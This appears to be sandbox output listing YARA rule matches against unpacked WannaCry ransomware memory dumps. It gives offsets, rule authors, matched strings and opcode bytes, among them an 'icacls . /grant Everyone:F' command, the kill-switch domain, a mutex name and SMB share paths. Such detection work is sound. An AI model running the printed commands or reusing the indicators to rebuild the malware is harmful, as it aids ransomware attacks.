6.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.2.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
6.2.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1ff9128.3.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1ff9128.3.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.1ff9128.3.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1ff9128.3.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.2.mssecsvc.exe.1fc7084.4.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1fc7084.4.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x28ede4:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x27ebb0:$x3: tasksche.exe 0x28edc0:$x3: tasksche.exe 0x28ed9c:$x4: Global\MsWinZonesCacheCounterMutexA 0x28ee14:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x27ec1b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x24926c:$x7: mssecsvc.exe 0x264b94:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x27eb88:$x8: C:\%s\qeriuwjhrf 0x28ede4:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x249254:$s1: C:\%s\%s 0x264b7c:$s1: C:\%s\%s 0x27eb9c:$s1: C:\%s\%s 0x28ed14:$s3: cmd.exe /c "%s" 0x2c1268:$s4: msg/m_portuguese.wnry
17.2.mssecsvc.exe.1fc7084.4.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
17.2.mssecsvc.exe.1fc7084.4.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x28edc0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x28ede8:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.252496c.9.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.252496c.9.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.252496c.9.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.252496c.9.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.2.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.2.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.2.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
6.2.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.2.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.2.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.2.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
6.2.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.0.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.0.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.0.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
6.0.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
12.2.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.2.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.2.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.2.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.2.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
12.0.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.0.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.0.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.0.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.2.mssecsvc.exe.24f28c8.8.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.24f28c8.8.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x3136c:$x3: tasksche.exe 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
17.2.mssecsvc.exe.24f28c8.8.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
17.2.mssecsvc.exe.1fd6104.5.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1fd6104.5.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x1db57:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x76d0:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.1fd6104.5.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.24fd8e8.6.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.24fd8e8.6.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0x263b7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
